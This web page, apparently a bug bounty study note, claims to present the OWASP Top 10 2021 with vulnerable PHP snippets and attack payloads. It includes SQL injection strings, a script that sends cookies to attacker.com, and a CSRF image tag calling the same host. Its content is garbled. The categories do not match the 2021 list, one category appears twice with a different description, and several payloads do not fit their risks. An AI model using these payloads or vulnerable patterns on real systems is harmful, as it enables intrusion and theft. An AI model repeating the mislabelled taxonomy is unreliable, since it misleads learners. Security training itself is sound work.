owasp top 10 for bug bounty hunter

 

OWASP Top 10

    The OWASP Top 10 is a list of the most critical web application security risks, as identified by the Open Web Application Security Project (OWASP). The list is updated every few years to reflect the current state of web security. The latest version, OWASP Top 10 2021, was released in 2021 and includes the following risks

Injection attacks	where an attacker is able to inject malicious code into a web application, allowing them to access sensitive data or perform unauthorized actions. example:-                 An attacker is able to execute SQL commands on a web application by injecting them into a form field. payloads:                   A payload for an SQL injection attack might look like this: ' OR 1=1 -- vulnerable code and payloads:-                                                                 $username = $_POST['username']; $password = $_POST['password']; $query = "SELECT * FROM users WHERE username='$username' AND password='$password'"; $result = mysqli_query($conn, $query); A payload for this vulnerability might be:' OR 1=1 --
Broken authentication and session management	where an attacker is able to gain access to a user's account through weak or compromised authentication mechanisms. example:-                 An attacker is able to gain access to a user's account by guessing their password or using a stolen password. payloads:-                 A payload for a brute-force password attack might look like this: password123, password124, password125, ... vulnerable code and payloads:- $username = $_POST['username']; $password = $_POST['password']; $query = "SELECT * FROM users WHERE username='$username' AND password='$password'"; $result = mysqli_query($conn, $query); if (mysqli_num_rows($result) > 0) { $_SESSION['logged_in'] = true; header('Location: /dashboard'); } A payload for this vulnerability might be: admin, password123
Cross-site scripting (XSS)	where an attacker is able to inject malicious code into a website, allowing them to steal sensitive data or perform other malicious actions. example:-                  An attacker is able to inject JavaScript into a web page, allowing them to steal sensitive data such as user credentials. payloads:-                   A payload for a cross-site scripting attack might look like this: <script>alert('XSS')</script> vulnerable code and payloads:- $comment = $_POST['comment']; echo "<h1>Recent Comments</h1>"; echo "<p>$comment</p>"; A payload for this vulnerability might be:<script>alert('XSS')</script>
Insecure data storage	where sensitive data is not properly protected, making it vulnerable to theft or unauthorized access. example:-                   A web application stores sensitive data such as user passwords in plain text, making it vulnerable to theft. payloads:-                     A payload for an attack on insecure data storage might look like this: SELECT * FROM users vulnerable code and payloads:- $password = $_POST['password']; file_put_contents('passwords.txt', $password); A payload for this vulnerability might be: SELECT * FROM users
Security misconfiguration	where a web application is not properly configured, leaving it vulnerable to attacks. example:-                     A web application is not properly configured, leaving it open to attacks such as SQL injection or cross-site scripting. payloads:-                   A payload for an attack on security misconfiguration might look like this: /admin vulnerable code and payloads:- $page = $_GET['page']; include($page); A payload for this vulnerability might be: /admin
Cross-site request forgery (CSRF)	where an attacker is able to trick a user into performing unintended actions on a website. example:-                   An attacker is able to trick a user into performing unintended actions on a website, such as transferring money from their account. payloads:-                   A payload for a cross-site request forgery attack might look like this: <img src="http://attacker.com/csrf?cookie=value" /> vulnerable code and payloads:- $transfer_amount = $_POST['amount']; $query = "UPDATE accounts SET balance = balance + '$transfer_amount' WHERE account_id = 1"; mysqli_query($conn, $query); A payload for this vulnerability might be:<img src="http://attacker.com/csrf?amount=10000" />
Using components with known vulnerabilities	where a web application uses third-party components that have known security vulnerabilities. example:-                   A web application uses an old version of a third-party library that has known security vulnerabilities. payloads:-                   A payload for an attack on a vulnerable component might look like this: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php vulnerable code and payloads:- include('/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'); A payload for this vulnerability might be: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Insufficient logging and monitoring	where a web application does not properly log or monitor activity, making it difficult to detect and respond to security incidents. example:-                     A web application does not properly log user activity, making it difficult to detect and respond to security incidents. payloads:-                   A payload for an attack on insufficient logging and monitoring might look like this: GET /admin HTTP/1.1 vulnerable code and payloads:- $_SESSION['logged_in'] = true; A payload for this vulnerability might be:GET /admin HTTP/1.1
Failure to restrict URL access	where an attacker is able to access sensitive pages or resources on a website without proper authorization. example:-                       An attacker is able to access sensitive pages on a website by guessing or brute-forcing the URL. payloads:-                   A payload for an attack on failure to restrict URL access might look like this: /admin/users/delete?id=1 vulnerable code and payloads:- $page = $_GET['page']; include($page); A payload for this vulnerability might be: /admin/users/delete?id=1
Insufficient logging and monitoring	where a web application does not have sufficient security controls in place to protect against attacks. example:-                   A web application does not have sufficient security controls in place, such as input validation or encryption, leaving it vulnerable to attacks. payloads:-                 A payload for an attack on insufficient security controls might look like this: <script>document.location='http://attacker.com/'+document.cookie</script> vulnerable code and payloads:- $username = $_POST['username']; $password = $_POST['password']; $query = "SELECT * FROM users WHERE username='$username' AND password='$password'"; $result = mysqli_query($conn, $query); A payload for this vulnerability might be: <script>document.location='http://attacker.com/'+document.cookie</script>

The OWASP Top 10 is intended to provide a high-level overview of the most critical web application security risks. It is not a comprehensive list of all web security risks, but it is a good starting point for organizations to assess their own security posture.